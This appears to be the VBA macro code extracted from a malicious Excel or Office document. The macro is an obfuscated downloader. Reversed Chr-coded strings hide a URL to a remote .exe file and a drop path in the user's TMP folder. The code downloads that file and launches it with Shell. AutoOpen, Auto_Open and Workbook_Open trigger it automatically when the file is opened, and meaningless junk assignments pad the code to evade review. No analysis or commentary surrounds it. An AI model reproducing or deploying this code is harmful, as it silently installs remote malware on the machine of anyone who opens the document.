VfShullmLEqBzN = pTTbNWEDYVEMH(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(106) + Chr(105) + Chr(117) + Chr(117) + Chr(108) + Chr(117) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(111) + Chr(112) + Chr(46) + Chr(97) + Chr(47) + Chr(47) + Chr(58) + Chr(115) + Chr(112) + Chr(116) + Chr(116) + Chr(104))
If UdgClqTeAWOxyi = "VpxawqUqPyPNpR" Then
cTHZLkVORGzEYO = "qENmWVwxSNrJIk"
VwmdBqGiSKEhDV = "RkhmqtXWeRJMSg"
End If
kaXbtWhUKBZHLV = pTTbNWEDYVEMH("uv5newo")
IdqbMkbajbpny = Environ$(Chr(4 + 20 + 60) + Chr(50 + 27) + Chr(80 + 20 - 20)) + Chr(92) & kaXbtWhUKBZHLV
If NPQMMuHNGqHNP = "aInMJhEKnvhmoE" Then
qnUavRMYnudjhr = "ljfVWWzaezYpnV"
End If
OiXncuuRYeqqSB = "sgWehQXXZiyXEV"
waNCSMPXkoMPVF = "uGrYXOLxRwdTuw"
uYfIQORnSxJpkm VfShullmLEqBzN, IdqbMkbajbpny
Call Shell(IdqbMkbajbpny, vbNormalFocus)
End Sub
Sub AutoOpen()
oncSETPgyuUcvK
End Sub
Sub Auto_Open()
oncSETPgyuUcvK
End Sub
Private Function pTTbNWEDYVEMH(UJCggrLvWeoJIH)
JbVUODfocOImvm = EXgQpHSqTTDsBQ
  pTTbNWEDYVEMH = StrReverse(UJCggrLvWeoJIH)
If JbVUODfocOImvm = EXgQpHSqTTDsBQ Then EXgQpHSqTTDsBQ = aOjsxlVlUYDKnL
End Function
Sub Workbook_Open()
oncSETPgyuUcvK
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True